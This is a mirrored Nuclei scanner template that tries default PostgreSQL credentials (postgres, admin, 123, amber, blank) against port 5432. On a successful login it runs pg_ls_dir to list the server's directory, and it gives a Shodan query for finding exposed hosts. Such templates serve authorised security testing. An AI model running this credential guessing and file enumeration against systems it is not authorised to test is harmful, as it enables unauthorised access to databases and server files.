mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-01 00:03:39 +08:00
52 lines
1.4 KiB
YAML
52 lines
1.4 KiB
YAML
id: pgsql-file-read
|
|
|
|
info:
|
|
name: PostgreSQL File Read
|
|
author: pussycat0x
|
|
severity: high
|
|
description: |
|
|
Read and list the files within the PostgreSQL database,
|
|
reference:
|
|
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read
|
|
metadata:
|
|
verified: true
|
|
max-request: 8
|
|
shodan-query: "product:\"PostgreSQL\""
|
|
tags: js,network,postgresql,authenticated,enum
|
|
javascript:
|
|
- pre-condition: |
|
|
var m = require("nuclei/postgres");
|
|
var c = m.PGClient();
|
|
c.IsPostgres(Host, Port);
|
|
code: |
|
|
const postgres = require('nuclei/postgres');
|
|
const client = new postgres.PGClient;
|
|
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select pg_ls_dir('./');");
|
|
Export(connected);
|
|
|
|
args:
|
|
Host: "{{Host}}"
|
|
Port: 5432
|
|
User: "{{usernames}}"
|
|
Pass: "{{password}}"
|
|
Db: "{{database}}"
|
|
|
|
payloads:
|
|
usernames:
|
|
- postgres
|
|
- admin
|
|
password:
|
|
- postgres
|
|
-
|
|
- 123
|
|
- amber
|
|
database:
|
|
- postgres
|
|
|
|
attack: clusterbomb
|
|
|
|
extractors:
|
|
- type: json
|
|
json:
|
|
- '.Rows[].pg_ls_dir'
|
|
# digest: 4b0a0048304602210095a0f56d8e1159c3c63ad0ce828e6fbec808386269ca3f79cdf466f469db46a0022100d8496463e9008ace638ea54651811a2dac970d56641ab8ada49883425177e6a4:922c64590222798bb761d5b6d8e72950 |